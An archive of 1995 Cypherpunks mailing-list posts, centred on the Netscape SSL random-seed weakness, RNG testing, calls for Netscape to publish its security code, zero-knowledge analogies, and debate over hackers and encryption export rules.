hfarkas at vnet.ibm.com | http://newstand.ims.advantis.com/henry henry at nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys at pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Brought to you by Henry's Hardware: Home of the Pretty Good Hack "We're not fast, but it's not bad, and we're cheaper than the guy down the street!" =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMF7nGKDthkLkvrK9AQEIbwQAl7k86Tk4gY/KU9JYS4lyI63fH4lJYTHw +Pl85cx3M/RI/kO8N9ZaUih4Hh+8CnNl7xA6NWtURfcSuCCgW3mrdRbKT8KTW/3M hohmv3yyyU2Ot24B4hb2/lZN5s/fR2JMdsWhKoZdm19xnlQIMBjidP6zxcavE/JC GNbJm94mBIA= =L0lD -----END PGP SIGNATURE----- From sameer at c2.org Tue Sep 19 09:01:41 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 09:01:41 PDT Subject: SFChron Message-ID: <199509191556.IAA09022@infinity.c2.org> 'Security Hole Found in Netscape Software' C1.4 C4.1 Choice quotes: "But the breach raises the issue whether Netscape's software...will ever be safe enough..." "Mike Homer, vice president of marketing for Netscpae, said that recent breaches do not mean the products are flawed" "But if Netscape thinks one patch is all it will take, they are mistaken, said Sameer Parekh" -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From fair at clock.org Tue Sep 19 09:04:52 1995 From: fair at clock.org (Erik E. Fair (Time Keeper)) Date: Tue, 19 Sep 95 09:04:52 PDT Subject: Verification of Random Number Generators Message-ID: At 2:20 9/19/95, Eric Young wrote: >Now I had not noticed this, my library runs like a charm and things >appear random from the random number generator. This sort of error can >only be checked by reading the code and specifically looking at critical >routines like this the RNG seeding routines. The advantage of my code >being public is that some-one like Mike can have a look and pick up >problems like this. >The moral of the story I suppose is to be >paranoid about checking routines relating to RNG. Just an idle thought: it might be possible to do a probabalistic verification of a RNG by sampling it over some number of samples, and statistically analyzing the sample space. This would be analysis under the model of "RNG as black box" as opposed to (or rather, if you're smart, in addition to) code inspection & review. Any statisticians among us? Erik Fair From iagoldbe at csclub.uwaterloo.ca Tue Sep 19 09:35:25 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Tue, 19 Sep 95 09:35:25 PDT Subject: Random publicity was: articles In-Reply-To: <199509191435.HAA00275@infinity.c2.org> Message-ID: <43mrf2$arr@calum.csclub.uwaterloo.ca> In article <199509191435.HAA00275 at infinity.c2.org>, sameer wrote: > If you could, please send me the name of the reporter and >contact information for any articles you see regarding the netscape >hack. > >Thanks, >-- >sameer Voice: 510-601-9777 >Community ConneXion FAX: 510-601-9734 >An Internet Privacy Provider Dialin: 510-658-6376 >http://www.c2.org (or login as "guest") sameer at c2.org So far, I talked to the NYT and the WSJ yesterday, as well as the SF Chronicle. This morning, one of the University's publicity people forwarded Marketplace (a radio show) and CNN (sending a camera crew) to me. I've also received email from various people, including someone who works in security at the Pentagon. I wonder if I should tell them I'm not an American? - Ian "but I'm Canadian, so that's the same thing, right?" :-( From eli at UX3.SP.CS.CMU.EDU Tue Sep 19 09:51:00 1995 From: eli at UX3.SP.CS.CMU.EDU (Eli Brandt) Date: Tue, 19 Sep 95 09:51:00 PDT Subject: Explaining Zero Knowledge to your children In-Reply-To: <9509181655.AA06115@elysion.iaks.ira.uka.de> Message-ID: <9509191650.AA21716@toad.com> Hadmut Danisch suggested: > Alice is caught in a dark room somewhere on the world. She doesn't know > where she is, but there is a telephone in the room and she calls Bob to > ask him where she is. Bob claims to know it but doesn't want to reveal. > He calls her back. When the phone is ringing, he has proven the knowledge I don't think this captures the structure of a ZNP. There's no multi-round system, for one thing. how about this: Alice and Bob have a big, complicated maze, preferably non-planar. Alice can solve the maze, and wants to prove this to Bob. Alice picks a point P on a solution path. Bobs asks Alice to (a) exhibit a path from Start to P. or (b) exhibit a path from P to Finish. Alice can easily do either one. If Alice doesn't know the maze, she can try to cheat, by picking a P by tracing forwards from Start, or by tracing backwards from Finish. These ploys allow her to sleaze through tests (a) and (b) respectively. But if Bob flips a coin to select (a) versus (b), he has a 50-percent chance of catching with each round. This is not really zero-knowledge. With each round, Alice is giving Bob substantial knowledge about the maze. With sufficient rounds, she ends up giving him the whole thing. But if the maze is hairy enough, this captures the idea that Alice can prove (to within epsilon) to Bob that she has a solution, without giving it away entirely. -- Eli Brandt eli+ at cs.cmu.edu From tcmay at got.net Tue Sep 19 09:51:07 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 09:51:07 PDT Subject: Why Surveillance State Needs Toy Crypto Message-ID: At 8:19 AM 9/19/95, Christian Wettergren wrote: >What I don't understand is why the law-enforcement is so concerned >about bruting things. It is probably quite easy to tap the keyboard, >smart force, exchange the binary with the real thing etc for them? > >(Unless they want to read it all from a nice tipped-back armchair in >a certain location? :-)) > >What I'm saying is that this kind of attack should work quite easily >in the one-by-one cases, but not on a large scale, malicious data, >trojan horses, outright bugging. So why all this Clipper (son-of-X) >fuss? It's really about the threat model. Sure, the authorities _could_ place microphones in offices and homes, but this requires huge amounts of effort and is only justified when the target is really, really important. As Whit Diffie has said (and this makes about the fifth time I've credited him on this, so I hope he's satisfied), widespread surveillance must attack the communication channels, not just attack the origins and destinations. That is, the _economics_ of mandating weak crypto are vastly more efficient for the surveillance state. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From tcmay at got.net Tue Sep 19 09:51:14 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 09:51:14 PDT Subject: Investing on Information We Get Here Message-ID: At 1:35 PM 9/19/95, Duncan Frissell wrote: >At 11:00 PM 9/18/95 -0400, John Young wrote: >> The New York Times, September 19, 1995, pp. A1, D21. >> >> >> Security Flaw Is Discovered In Software Used in Shopping >> >> By John Markoff > >On the Front Page, *above* the fold. Perhaps John was trying to make up for >being scooped by the WSJ on the SSL Crack story. Also front page, above the fold, for the "San Jose Mercury News," the newspaper of record of the Silicon Valley. And CNBC is reporting the story on its hourly updates of the news. (These computer lists are really great for investors! I heard about the Apple problems a few days before they hit the street, and was able to unload a bunch of shares at $45, a day before it dropped, now down to around $36. "He who hesitates to act on inside information is lost.") P.S. On Netscape, I've finally decided to do some buying. Sure, this latest flaw is another embarrassment. But more deals and link-ups than ever are being inked, and they've got the resources to really spruce up Navigator and related products. I just don't see too many competitors on the horizon. Actually, I was planning to buy some Netscape stock, now that the IPO froth has settled. And since I have this info on the flaw, I _have_ to buy it, else be guilty of "insider non-trading." As Stew Brownstein, a friend of mine, has noted, if insider trading rules are interpreted logically, then _failure_ to make a planned trade on the basis of insider information is just as illegal as deciding to make some trade on the basis of insider information. The SEC should require all insiders to file a daily report, preferably before the market opens in NY, listing all of their planned transactions for that day, so that violations of the "insider non-trading" laws can be detected and prosecuted. (Yes, I know that I am not an "insider" by SEC definitions. Poetic license.) --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From aba at dcs.exeter.ac.uk Tue Sep 19 09:55:48 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 09:55:48 PDT Subject: NYT on Netscape Crack Message-ID: <155.9509191654@exe.dcs.exeter.ac.uk> Andrew Loewenstern writes: > Jeff Weinstein writes: > > Regardless of what Markoff implies, we do not intend to depend > > on security through obscurity. > > Oh, can we now expect to see source to at least the security portions of > Navigator and the Commerce server? An excellent proposal. Well how about it Jeff/netscape? Save Ian and David the effort of reverse engineering it again (which it is obviously pointless, and more: mathematically impossible, to do), and get your self some free advice. Better to have free advice, and quickly now, rather than another disaster later, presume netscapes cred can't take too many more bashings before this starts affecting share prices etc. Posting the code for the random number generator would be an excellent start. Kirkov (sp?) principle and all. Or if that doesn't sit well with copyright interests, how about writing up an open spec about how the random number generator works? Then we can critique it. An algorithm should be something to be proud of, "it's secure, and see: this is how it works, here are the design criteria, here is how you would attempt to break it, and here is the best predicted attack's cost." Lets get something useful out of this, an open system is called for not just a quick switcheroo of another algorithm. Open systems, rule! (I thought netscape was big on open systems, reading some of the blurb, just now). I'm sure you'd get some useful, valuable feed back from publishing an open spec, is netscape still a progressive startup company with hot programmers running the show, or has it slipped into stuffy corporate realms already? Respectfully, Adam From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 09:58:16 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 09:58:16 PDT Subject: Verification of Random Number Generators Message-ID: <9509191654.AA00901@ch1d157nwk> > Just an idle thought: it might be possible to do a probabalistic > verification of a RNG by sampling it over some number of samples, > and statistically analyzing the sample space. This would be analysis > under the model of "RNG as black box" as opposed to (or rather, if > you're smart, in addition to) code inspection & review. Any > statisticians among us? But this wouldn't have solved Netscape's problem. Netscape was using a pretty good PRNG (the one in RSAREF). The problem was they were/are using a naive method of seeding it. The output of the PRNG would have been statistically random, but since the seed had ridiculously little entropy it was easy to guess. andrew From sunder at dorsai.dorsai.org Tue Sep 19 10:01:59 1995 From: sunder at dorsai.dorsai.org (Ray Arachelian) Date: Tue, 19 Sep 95 10:01:59 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Mon, 18 Sep 1995, Steven Levy wrote: > No chance. The problem for me isn't that someone wanted to call a movie > Hackers but that it causes confusion in that for eleven years there has > been a preexisiting work by that name. There is a novelization of the > screenplay now in paperback, so when if a friend recommends that you buy > Hackers, you'll probably buy that one. (especially since Dell is > determined to do as little as possible for my own book). Or vice versa. Someone could want to get the book based on the movie and wind up buying your book - thereby benefiting you instead of Dell or whomever is publishing the one based on the screen play. I wouldn't worry over it. :-) It may turn out that this will cause your book to suddenly surge. ========================================================================== + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | _ |> \|/ |sunder at dorsai.org| Where day by day, yet another | \ | <--+-->| | Constitutional right vanishes. | \| /|\ | Just Say | | <|\ + v + | "No" to the NSA!| Jail the censor, not the author!| <| n ========================================================================== From bdavis at thepoint.net Tue Sep 19 10:02:12 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Sep 95 10:02:12 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: <9509170429.AA05221@zorch.w3.org> Message-ID: On Sun, 17 Sep 1995 hallam at w3.org wrote: > > >I saw "Hackers" yesterday. It's not bad and its political sensibility is > >very cyberpunk. The ad campaign even uses the tag line, "Their only crime > >is curiosity." > > I know companies who have spent millions cleaning up after a hacker breakin. > I've been up at two in the morning trying to stop a person with known mental > problems breaking into a site with some very dangerous computer controlled > machinery. I've dealt with people trying to get rich quick by defrauding others. > I've met some real evil bastards who simply want to ruin as many other peoples > lives as they possibly can, including people that thought they were their > friends. > > To me teenagers who break into computer systems are not funny at all, its like > joyriding, its funny until someone gets hurt. I know people who have got hurt > real bad. > > I like having privacy, part of the cost of that privacy is respecting the > privacy of others. > > Phill > Phill obviously presents one point of view, vigorously and well. What do the rest of you think about a teen who, say, busts into a .edu site, plays with the files, and ultimately brings the system down entirely for 36 hours? Fun and games? Send him to his room, sans modem? Prosecute him? Have a TLA hire him??? Not an easy answer for me for "mere trespass," but as damage mounts, it becomes easier. I'll try to post later tonight on my prior key escrow question. EBD Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From mark at unicorn.com Tue Sep 19 10:14:30 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Tue, 19 Sep 95 10:14:30 PDT Subject: "Hackers"-- brief review and anecdote... Message-ID: On Sun, 17 Sep 1995, Brian Davis wrote: > Phill obviously presents one point of view, vigorously and well. What do > the rest of you think about a teen who, say, busts into a .edu site, > plays with the files, and ultimately brings the system down entirely for > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > him? Have a TLA hire him??? If it wasn't for ITAR the Net would already have secure encryption and authentication, and most such hacker attacks would be impossible (or at least impractical). Mark From andrew_loewenstern at il.us.swissbank.com Tue Sep 19 10:39:18 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Tue, 19 Sep 95 10:39:18 PDT Subject: NYT on Netscape Crack Message-ID: <9509191738.AA00941@ch1d157nwk> Adam Back writes: > Posting the code for the random number generator would be an > excellent start. Ian posted the code for the PRNG on August 30th and Stephen Kapp noted that it was similar to one in RSAREF. The PRNG is probably fine. The big flaw here was the collection of seed material. The bottom line is the WHOLE security subsystem should be published for analysis. > Or if that doesn't sit well with copyright interests, how about > writing up an open spec about how the random number generator works? > Then we can critique it. Netscape did this with SSL and what happened was the rest of the industry jumped on it before any analysis was done. Now we are likely stuck with a poor protocol. > An algorithm should be something to be proud of, "it's secure, and > see: this is how it works, here are the design criteria, here is > how you would attempt to break it, and here is the best predicted > attack's cost." The design may be great, but if the implementation is flawed then you aren't much better off. To attempt to evaluate the security of a system you need to be able to inspect the implementation. Period. > is netscape still a progressive startup company with hot programmers > running the show, or has it slipped into stuffy corporate realms > already? Netscape may have hot programmers but so far I believe it has become self-evident that they know little about crypto and implementing cryptosystems. To Netscape's credit, Jeff Weinstein claims that the team implementing the security for Navigator 2.0 is completely new and of course Netscape has hired Tahir ElGamal, who certainly knows what he is doing. Additionally I would suspect that with all the bad publicity they are receiving they would take up Bidzos on RSADSI's offer to analyze the source. So it is entirely possible that Navigator 2.0 will be much better. However, I am not holding my breath. Strong crypto is _hard_ to implement properly. Even if a product is using a well-known algorithm there could be any number of subtle flaws that can destroy any security offered by such algorithm. You can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing is secure. andrew From tcmay at got.net Tue Sep 19 10:46:24 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 19 Sep 95 10:46:24 PDT Subject: Mini-mailbombs and Warning Letters Message-ID: (This is not about MIME, but the astute reader will see some parallels...) I've received a couple of "automatically generated" pieces of e-amil which tell me that, in the generator's opinion, something is wrong with my public key, or it could not be found at the keyserver preferred by the owner of the mail generator, etc. Quoting from the latest: (identity of generator owner witheld) "P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com ) for details." As the saying goes, "Sigh." Being on a list with 700 subscribers, some of whom are running increasingly sophisticated automatic checking agents, I foresee an increase in these "warning letters" from their checking agents who feel posts are not adequate in some way. A minor issue, but symptomatic of trends. I'm dealing with it the same way I'm dealing with the few people who have something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to treat their text as attachments. Namely, by filtering them out. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From danisch at ira.uka.de Tue Sep 19 10:53:26 1995 From: danisch at ira.uka.de (Hadmut Danisch) Date: Tue, 19 Sep 95 10:53:26 PDT Subject: Avoiding weak IDEA keys? Message-ID: <9509151215.AA00774@elysion.iaks.ira.uka.de> At the CRYPTO '93 there was a presentation about weak IDEA keys (page 224 of the proceedings). Does anybody know about IDEA implementations considering this and trying to avoid weak keys, e.g. by using the modified key schedule? Hadmut From bdavis at thepoint.net Tue Sep 19 10:54:27 1995 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 19 Sep 95 10:54:27 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > On Sun, 17 Sep 1995, Brian Davis wrote: > > > Phill obviously presents one point of view, vigorously and well. What do > > the rest of you think about a teen who, say, busts into a .edu site, > > plays with the files, and ultimately brings the system down entirely for > > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > > him? Have a TLA hire him??? > > If it wasn't for ITAR the Net would already have secure encryption and > authentication, and most such hacker attacks would be impossible (or at > least impractical). > > Mark The non-responsive answer is stricken from the record. :-) You mean "secure" as Netscape was secure from sameer et al.? Apples and oranges answer to my perhaps-not-so-hypothetical question. Still waiting for a serious response ... Brian From lethin at ai.mit.edu Tue Sep 19 11:03:34 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Tue, 19 Sep 95 11:03:34 PDT Subject: unabomber paper Message-ID: <199509191803.OAA15542@grape-nuts.ai.mit.edu> is available on http://www.ai.mit.edu/misc/unabomber From aba at dcs.exeter.ac.uk Tue Sep 19 11:08:54 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 19 Sep 95 11:08:54 PDT Subject: NYT on Netscape Crack In-Reply-To: <9509191738.AA00941@ch1d157nwk> Message-ID: <429.9509191807@exe.dcs.exeter.ac.uk> Andrew Loewenstern writes: > Ian posted the code for the PRNG on August 30th and Stephen Kapp > noted that it was similar to one in RSAREF. The PRNG is probably > fine. Yeah I saw both. > The big flaw here was the collection of seed material. This was what I was trying to say. I was thinking that it would be useful if they would care to disclose this part of the implementation, where the entropy comes from, and how they estimate it. > The bottom line is the WHOLE security subsystem should be published > for analysis. Absolutely, but can you see netscape adopting the GPL, with full source availability? Of course this would be ideal, but I was hoping for at least the source as pertaining to the random number generator which is the essence of the current problem. > > Or if that doesn't sit well with copyright interests, how about > > writing up an open spec about how the random number generator works? > > Then we can critique it. > > Netscape did this with SSL and what happened was the rest of the industry > jumped on it before any analysis was done. Now we are likely stuck with a > poor protocol. Yeah well if open systems is taken to mean, we make up a standard, tell you about it and if you don't like it well it's too late because we've blasted it across the internet to the extent that there's no turning back. An approach more in keeping with the IETF frame work would have been better. If it's open standards why not accept existing standards, or contribute to a IETF working group to decide one which is agreed upon. I'd call that more open. > > An algorithm should be something to be proud of, "it's secure, and > > see: this is how it works, here are the design criteria, here is > > how you would attempt to break it, and here is the best predicted > > attack's cost." > > The design may be great, but if the implementation is flawed then > you aren't much better off. To attempt to evaluate the security of > a system you need to be able to inspect the implementation. Period. Well yes, but the current flaw the design wasn't even correct, although the implementation of that design was. Both would be ideal but a design and proof of having audited it would be good if they are expecting people to trust this thing for megabucks as internet commerce takes off. > Netscape may have hot programmers but so far I believe it has become > self-evident that they know little about crypto and implementing > cryptosystems. yup. > To Netscape's credit, Jeff Weinstein claims that the team > implementing the security for Navigator 2.0 is completely new and of > course Netscape has hired Tahir ElGamal, who certainly knows what he > is doing. Additionally I would suspect that with all the bad > publicity they are receiving they would take up Bidzos on RSADSI's > offer to analyze the source. So it is entirely possible that > Navigator 2.0 will be much better. However, I am not holding my > breath. Well I highly doubt they'd GPL the code. Or even make the code available. But it would be really, really nice if a fresh outlook was taken on this, code is required to trust the thing, as that shows a willingness to expose the workings, and confidence in the implementation, and algorithms. I hope some serious thought goes into this issue at netscape, about giving out code for their security implementation. There are still possibilities for server bugs, and so on. > Strong crypto is _hard_ to implement properly. Even if a product is > using a well-known algorithm there could be any number of subtle > flaws that can destroy any security offered by such algorithm. You > can't just toss in RSA, IDEA, RC-4, DES, etc... and claim the thing > is secure. No, you can't. Sadly, I presume that they have no intention of releasing source. So we'll have to be content with RSADSI security audit. Or another break. Adam From dl at hplyot.obspm.fr Tue Sep 19 11:09:19 1995 From: dl at hplyot.obspm.fr (Laurent Demailly) Date: Tue, 19 Sep 95 11:09:19 PDT Subject: (Yet Another?) Netscape Crack Web page In-Reply-To: <9509191431.AA23188@hplyot.obspm.fr> Message-ID: <9509191808.AA24749@hplyot.obspm.fr> > http://hplyot.obspm.fr/~dl/netscapesec/ I have designed and added what I consider a nice looking logo for that page, have a look :-) {I'm not an artist though, but xv, xpaint and patience can make wonders} Regards dl -- Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept From nielsenc at upgrade.com Tue Sep 19 11:18:41 1995 From: nielsenc at upgrade.com (Christopher Nielsen) Date: Tue, 19 Sep 95 11:18:41 PDT Subject: Verification of Random Number Generators In-Reply-To: Message-ID: <199509191817.OAA05143@upgrade.com> On Tue, 19 Sep 1995 09:04:29 -0700 "Erik E. Fair" wrote: -------- >> >> Just an idle thought: it might be possible to do a probabalistic >> verification of a RNG by sampling it over some number of samples, and >> statistically analyzing the sample space. This would be analysis under the >> model of "RNG as black box" as opposed to (or rather, if you're smart, in >> addition to) code inspection & review. Any statisticians among us? >> >> Erik Fair >> But statistical tests of randomness alone do not make a good RNG. At least, not for cryptographic use. A cryptographically secure RNG is also unpredictable, i.e., computationally unfeasible to predict the next random bit will be given the algorithm, and not reliably reproduced, i.e., multiple runs with the exact same input do not generate the same sequence. -Chris =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Christopher Nielsen UCA&L System and Network Administrator Buffalo, New York (nielsenc at upgrade.com) #include From droelke at rdxsunhost.aud.alcatel.com Tue Sep 19 11:21:57 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Tue, 19 Sep 95 11:21:57 PDT Subject: Verification of Random Number Generators Message-ID: <9509191821.AA21270@spirit.aud.alcatel.com> > > Just an idle thought: it might be possible to do a probabalistic > verification of a RNG by sampling it over some number of samples, and > statistically analyzing the sample space. This would be analysis under the > model of "RNG as black box" as opposed to (or rather, if you're smart, in > addition to) code inspection & review. Any statisticians among us? > In a word - no. In a longer description - you can black box test the *pseudo-RNG in one of two ways. One, input a key, and then keep asking for numbers. The numbers should be statistically distributed, and should have a very long repeat cycle. (i.e. basic "good" pseudo-random number generator theory) Two, input different keys, and then ask for a number. Again, the numbers should be statistically distributed, even for small changes in the input numbers. What *both* of those methods don't test, is the key(seed) generation, which is what was attacked on Netscape. The seed number must be truely random, and unknowable to the attacker, otherwise they can duplicate the random number generator. Remember that all random number generators in software are really pseudo-random number generators, and rely on having seed value. BTW: In some ways, I feel sorry for Netscape being nailed by everyone including the press like this. BUT - they must also accept that with being popular, that they will be subject to intense scrutiny. Besides - if you are going to attack a cryptosystem, why not get your 15 minutes of fame out of deal while you are at it ;-) Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From lethin at ai.mit.edu Tue Sep 19 11:22:00 1995 From: lethin at ai.mit.edu (Rich Lethin) Date: Tue, 19 Sep 95 11:22:00 PDT Subject: ASCII unabomber paper attribution and FTP address Message-ID: <199509191821.OAA15570@grape-nuts.ai.mit.edu> N.B. unabomber paper is is via JYA_lbr. Also available via FTP ftp://ftp.ai.mit.edu/users/misc/unabomber From sameer at c2.org Tue Sep 19 11:34:23 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 11:34:23 PDT Subject: "Hackers"-- brief review and anecdote... In-Reply-To: Message-ID: <199509191829.LAA09602@infinity.c2.org> > > On Tue, 19 Sep 1995, Rev. Mark Grant wrote: > > > On Sun, 17 Sep 1995, Brian Davis wrote: > > > > > Phill obviously presents one point of view, vigorously and well. What do > > > the rest of you think about a teen who, say, busts into a .edu site, > > > plays with the files, and ultimately brings the system down entirely for > > > 36 hours? Fun and games? Send him to his room, sans modem? Prosecute > > > him? Have a TLA hire him??? > > > > If it wasn't for ITAR the Net would already have secure encryption and > > authentication, and most such hacker attacks would be impossible (or at > > least impractical). > > > > Mark > > The non-responsive answer is stricken from the record. :-) > You mean "secure" as Netscape was secure from sameer et al.? > The first two hacks listed on my web page were made possible because of ITAR. Without ITAR Netscape would not have been suspectible to this attack. Two out of three fits my definition of "most". -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From kelso at netcom.com Tue Sep 19 11:49:36 1995 From: kelso at netcom.com (Tom Rollins) Date: Tue, 19 Sep 95 11:49:36 PDT Subject: Crypto Sync Issue Message-ID: <199509191846.LAA24272@netcom4.netcom.com> Hello, I am interested in encrypting a SLIP link between my PC (running Linux) and my Netcom shell account (running SLIRP). My question has to do with error conditions on the line. If I drop a character or packet, the two sides will loose crypto sync and result in things scrambled from then on. The modems will fix most of the low level problems. However, Murphy's Law has not been repealed. :) Are there any standard methods to provide the SYNC between the sender(encryption) and the receiver(decryption) on an Async connection ? Since Slip uses IP packets, I was planning on an encryption of the data portion of the IP packets (leaving the header alone). Thanks, Tom Rollins From lmccarth at cs.umass.edu Tue Sep 19 11:56:10 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 11:56:10 PDT Subject: Encryption algorithms used in PrivaSoft In-Reply-To: <9509191826.AA19743@server1.deltanet.com> Message-ID: <9509191855.AA04334@cs.umass.edu> Dear PrivaSoft- Your Web page, "What is PrivaSoft ?" (http://www.megasoft.com/privasoft/about.html) says: > How does it work? > > PrivaSoft scrambles and descrambles an image of the document using Bitmap > encryption. When scrambling, PrivaSoft divides the document into tiny tiles > and shuffles them pseudo-randomly using your secret key as part of the > encryption algorithm. This is an extremely general description of encryption and decryption. I am interested in learning more about the cryptographic algorithms used in the PrivaSoft product. Where should I look for further details ? Are there technical contacts within your organization who would be willing to discuss this in email ? References would be greatly appreciated. Sincerely -L. McCarthy From lmccarth at cs.umass.edu Tue Sep 19 12:10:54 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 12:10:54 PDT Subject: ASCII unabomber paper attribution and FTP address In-Reply-To: <199509191821.OAA15570@grape-nuts.ai.mit.edu> Message-ID: <9509191910.AA04919@cs.umass.edu> Rich Lethin writes: > N.B. unabomber paper is is via JYA_lbr. Also available via FTP > > ftp://ftp.ai.mit.edu/users/misc/unabomber Actually it's: ftp://ftp.ai.mit.edu/pub/users/misc/unabomber From sameer at c2.org Tue Sep 19 12:29:18 1995 From: sameer at c2.org (sameer) Date: Tue, 19 Sep 95 12:29:18 PDT Subject: Verification of Random Number Generators In-Reply-To: <9509191821.AA21270@spirit.aud.alcatel.com> Message-ID: <199509191924.MAA20090@infinity.c2.org> > > BTW: In some ways, I feel sorry for Netscape being nailed by everyone > including the press like this. BUT - they must also accept that I'm sorry, but they deserve it. Their seed generation was just plain stupid. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From lmccarth at cs.umass.edu Tue Sep 19 12:29:35 1995 From: lmccarth at cs.umass.edu (L. McCarthy) Date: Tue, 19 Sep 95 12:29:35 PDT Subject: Encryption algorithms used in PrivaSoft (fwd) Message-ID: <9509191929.AA15153@cs.umass.edu> Confirming suspicions that PrivaSoft is a security-through-obscurity outfit: > From: David Clavadetscher > Subject: Re: Encryption algorithms used in PrivaSoft > > Dear L., > > At this time our crypto engine is patented and proprietary. If you tell me > the intent of your interest I will see what other information we can provide > to you. Call me if you like. [...] From tedwards at Glue.umd.edu Tue Sep 19 12:38:35 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:38:35 PDT Subject: NYT on Netscape Crack In-Reply-To: <199509190355.XAA01329@frankenstein.piermont.com> Message-ID: On Mon, 18 Sep 1995, Perry E. Metzger wrote: > Not, of course, that they disclosed it before -- it was found by > reverse engineering the distributed executable. Not, of course, that > they have a choice in the matter of whether to disclose it -- they > will be "disclosing" how its done as soon as they release the > code. Not, of course, that security through obscurity does any good -- > it just magnifies the pain. Well, now that Cypherpunks have again shown yet another hole in Netscape security, I think we are one pretty good standing to demand ACCESS TO SOURCE CODE FOR NETSCAPE, so we can work to help make Netscape "pretty good". Any reporters listening? -Thomas From tedwards at Glue.umd.edu Tue Sep 19 12:44:12 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:44:12 PDT Subject: NSA and Netscape Crack (Re: NYT on Netscape Crack) In-Reply-To: Message-ID: On Mon, 18 Sep 1995, Timothy C. May wrote: > If the "flaws" are being found by our group, as John notes, just what is > the NSA doing in the _second_ role it is supposed to have, it's "COMSEC," > or communications security, role? Gee Tim, NSA is "helping" us out by creating Clipper and new key escrow mechanisms ;) "I'm from the NSA, I'm here to help your crypto..." -Thomas From tedwards at Glue.umd.edu Tue Sep 19 12:46:05 1995 From: tedwards at Glue.umd.edu (Thomas Grant Edwards) Date: Tue, 19 Sep 95 12:46:05 PDT Subject: AOL monitoring In-Reply-To: <+3OXwAgbBgzR084yn@panix.com> Message-ID: On Sun, 17 Sep 1995, Sal Denaro wrote: > 2) My .newsrc file can tell anyone that I read alt.hackers and alt.2600 Hmmm...potential new crypto product...a "secure" newsreader with encrypted .newsrc? -Thomas From stewarts at ix.netcom.com Tue Sep 19 12:47:34 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 19 Sep 95 12:47:34 PDT Subject: Verification of Random Number Generators Message-ID: 